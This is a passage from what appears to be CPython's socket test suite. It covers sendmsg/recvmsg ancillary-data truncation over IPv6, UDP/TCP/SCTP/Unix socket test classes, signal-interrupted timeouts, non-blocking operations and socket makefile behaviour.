(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
